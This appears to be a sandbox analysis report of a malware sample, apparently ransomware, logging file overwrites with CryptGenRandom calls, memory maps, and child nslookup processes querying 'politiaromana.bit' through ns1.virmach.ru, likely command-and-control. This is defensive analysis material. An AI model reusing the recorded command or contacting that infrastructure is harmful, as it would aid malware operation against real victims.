| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\gtMj5dvrEffpxCN.pdf, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\Uxo8b6v.m4a, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\Uxo8b6v.m4a, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\z6JgWitYLK.pdf, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\z6JgWitYLK.pdf, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\ivgKlBjI9.wav, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\ivgKlBjI9.wav, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\ZRjAo5mazeN.mp3, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\ZRjAo5mazeN.mp3, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\86j9DrKplH4.m4a, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\86j9DrKplH4.m4a, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\DHPDPLo.odt, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\DHPDPLo.odt, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\A8bmjbQ.flv, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\A8bmjbQ.flv, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\JIofEOBdEma0DMUbK.flv, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\JIofEOBdEma0DMUbK.flv, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\9oWgPalpl4eZPpCd.pdf, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\9oWgPalpl4eZPpCd.pdf, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\ApDFPQwO402DkMuco.xls, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\ApDFPQwO402DkMuco.xls, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\vLMfJAjyPseo6Kmg.mp3, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\vLMfJAjyPseo6Kmg.mp3, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\Dt6fR5uK1o7A3G9Az9xZ.swf, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\Dt6fR5uK1o7A3G9Az9xZ.swf, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\Qz05DmCXS7.jpg, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\Qz05DmCXS7.jpg, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\u3j1lsXp4o0dJ.flv, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\u3j1lsXp4o0dJ.flv, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\UHagWXyAwvvYR6B2f.odt, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\UHagWXyAwvvYR6B2f.odt, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\P9p5SRi7OL0lv.mp3, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\P9p5SRi7OL0lv.mp3, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\pzNmYBUWbUH.ods, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\pzNmYBUWbUH.ods, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\qI3Ls7msTJ7Z5.gif, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
|
For performance reasons, the remaining 885 entries are omitted.
The remaining entries can be found in glog.xml. |
|||||
Process #11: nslookup.exe
8
19
| Information | Value |
|---|---|
| ID | #11 |
| File Name | c:\windows\syswow64\nslookup.exe |
| Command Line | nslookup politiaromana.bit ns1.virmach.ru |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:02:14, Reason: Child Process |
| Unmonitor | End Time: 00:03:23, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:09 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xdc4 |
| Parent PID | 0xd40 (c:\users\nd9e1fyi\appdata\roamingqtp35.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | X2VS1CUM\Nd9E1FYi |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
DC8
0x
DF4
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x00021fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00044fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000050000 | 0x00050000 | 0x00053fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000060000 | 0x00060000 | 0x00060fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| nslookup.exe | 0x00070000 | 0x00086fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x0000000000090000 | 0x00090000 | 0x0408ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000004090000 | 0x04090000 | 0x04091fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000004090000 | 0x04090000 | 0x04093fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000040a0000 | 0x040a0000 | 0x040dffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000040e0000 | 0x040e0000 | 0x0411ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000004120000 | 0x04120000 | 0x04121fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000004130000 | 0x04130000 | 0x0416ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000004170000 | 0x04170000 | 0x04170fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000004180000 | 0x04180000 | 0x04180fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000004190000 | 0x04190000 | 0x0419ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000041a0000 | 0x041a0000 | 0x041dffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000041e0000 | 0x041e0000 | 0x041e0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000004200000 | 0x04200000 | 0x043fffff | Private Memory | Readable, Writable |
|
|
|
- |
| locale.nls | 0x04400000 | 0x044bdfff | Memory Mapped File | Readable |
|
|
|
- |
| imm32.dll | 0x044c0000 | 0x044e9fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000004590000 | 0x04590000 | 0x0468ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000004690000 | 0x04690000 | 0x04817fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000004840000 | 0x04840000 | 0x0484ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000004850000 | 0x04850000 | 0x049d0fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000049e0000 | 0x049e0000 | 0x05ddffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000005de0000 | 0x05de0000 | 0x061dafff | Pagefile Backed Memory | Readable |
|
|
|
- |
| sortdefault.nls | 0x061e0000 | 0x06516fff | Memory Mapped File | Readable |
|
|
|
- |
| wow64win.dll | 0x542b0000 | 0x54329fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64.dll | 0x54330000 | 0x5437ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64cpu.dll | 0x54380000 | 0x54387fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| winrnr.dll | 0x6f220000 | 0x6f22afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nlaapi.dll | 0x6f230000 | 0x6f243fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pnrpnsp.dll | 0x6f250000 | 0x6f265fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| napinsp.dll | 0x6f270000 | 0x6f281fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| fwpuclnt.dll | 0x71540000 | 0x71586fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rasadhlp.dll | 0x71590000 | 0x71597fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| iphlpapi.dll | 0x715a0000 | 0x715cefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| dnsapi.dll | 0x715d0000 | 0x71653fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| mswsock.dll | 0x71660000 | 0x716aefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| bcrypt.dll | 0x73860000 | 0x7387afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cryptbase.dll | 0x73bb0000 | 0x73bb9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sspicli.dll | 0x73bc0000 | 0x73bddfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nsi.dll | 0x73be0000 | 0x73be6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ws2_32.dll | 0x740c0000 | 0x7411efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x74120000 | 0x741fffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x74300000 | 0x743bdfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x74530000 | 0x7455afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x74610000 | 0x746bcfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| bcryptprimitives.dll | 0x74fd0000 | 0x75027fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x75090000 | 0x750d3fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x764e0000 | 0x7662efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernelbase.dll | 0x766c0000 | 0x7683dfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x76840000 | 0x76986fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x76e90000 | 0x7700afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x000000007eac0000 | 0x7eac0000 | 0x7ebbffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x000000007ebc0000 | 0x7ebc0000 | 0x7ebe2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7df9abbfffff | Private Memory | Readable |
|
|
|
- |
| pagefile_0x00007df9abc00000 | 0x7df9abc00000 | 0x7ff9abbfffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ff9abc00000 | 0x7ff9abdc0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x00007ff9abdc1000 | 0x7ff9abdc1000 | 0x7ffffffeffff | Private Memory | Readable |
|
|
|
- |
Threads
Thread 0xdc8
8
19
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Get Handle | module_name = c:\windows\syswow64\nslookup.exe, base_address = 0x70000 |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM |
|
1 | |
| Socket | Close | type = SOCK_DGRAM |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = DNSLookupOrder |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = Domain |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = DhcpDomain |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DNSClient |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = SearchList |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = DhcpSearchList |
|
1 | |
| DNS | Get Hostname | name_out = x2vS1cum |
|
1 | |
| DNS | Resolve Name | host = ns1.virmach.ru, address_out = 109.234.35.56 |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM |
|
1 | |
| Socket | Connect | remote_address = 109.234.35.56, remote_port = 53 |
|
1 | |
| Socket | Send | flags = NO_FLAG_SET, size = 44, size_out = 44 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 44 |
|
1 | |
| Socket | Close | type = SOCK_DGRAM |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM |
|
1 | |
| Socket | Connect | remote_address = 109.234.35.56, remote_port = 53 |
|
1 | |
| Socket | Send | flags = NO_FLAG_SET, size = 35, size_out = 35 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 51 |
|
1 | |
| Socket | Close | type = SOCK_DGRAM |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM |
|
1 | |
| Socket | Connect | remote_address = 109.234.35.56, remote_port = 53 |
|
1 | |
| Socket | Send | flags = NO_FLAG_SET, size = 35, size_out = 35 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 107 |
|
1 | |
| Socket | Close | type = SOCK_DGRAM |
|
1 |
Process #13: nslookup.exe
8
19
| Information | Value |
|---|---|
| ID | #13 |
| File Name | c:\windows\syswow64\nslookup.exe |
| Command Line | nslookup politiaromana.bit ns1.virmach.ru |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:02:47, Reason: Child Process |
| Unmonitor | End Time: 00:03:23, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:36 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xee4 |
| Parent PID | 0xd40 (c:\users\nd9e1fyi\appdata\roamingqtp35.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | X2VS1CUM\Nd9E1FYi |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
EE8
0x
F04
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x00021fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00044fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000050000 | 0x00050000 | 0x00053fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000060000 | 0x00060000 | 0x00060fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| nslookup.exe | 0x00070000 | 0x00086fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x0000000000090000 | 0x00090000 | 0x0408ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000004090000 | 0x04090000 | 0x04091fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000004090000 | 0x04090000 | 0x04093fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000040a0000 | 0x040a0000 | 0x040dffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000040e0000 | 0x040e0000 | 0x0411ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000004120000 | 0x04120000 | 0x04121fff | Private Memory | Readable, Writable |
|
|
|
- |
| locale.nls | 0x04130000 | 0x041edfff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x00000000041f0000 | 0x041f0000 | 0x041f0fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000004200000 | 0x04200000 | 0x043fffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000004400000 | 0x04400000 | 0x0443ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000004440000 | 0x04440000 | 0x0447ffff | Private Memory | Readable, Writable |
|
|
|
- |
| imm32.dll | 0x04480000 | 0x044a9fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000004480000 | 0x04480000 | 0x04480fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000004490000 | 0x04490000 | 0x04490fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000044b0000 | 0x044b0000 | 0x044bffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000004500000 | 0x04500000 | 0x0450ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000004560000 | 0x04560000 | 0x0465ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000004660000 | 0x04660000 | 0x047e7fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000047f0000 | 0x047f0000 | 0x04970fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000004980000 | 0x04980000 | 0x05d7ffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000005d80000 | 0x05d80000 | 0x0617afff | Pagefile Backed Memory | Readable |
|
|
|
- |
| sortdefault.nls | 0x06180000 | 0x064b6fff | Memory Mapped File | Readable |
|
|
|
- |
| wow64win.dll | 0x542b0000 | 0x54329fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64.dll | 0x54330000 | 0x5437ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64cpu.dll | 0x54380000 | 0x54387fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| winrnr.dll | 0x6f440000 | 0x6f44afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nlaapi.dll | 0x6f450000 | 0x6f463fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pnrpnsp.dll | 0x6f470000 | 0x6f485fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| napinsp.dll | 0x6f490000 | 0x6f4a1fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
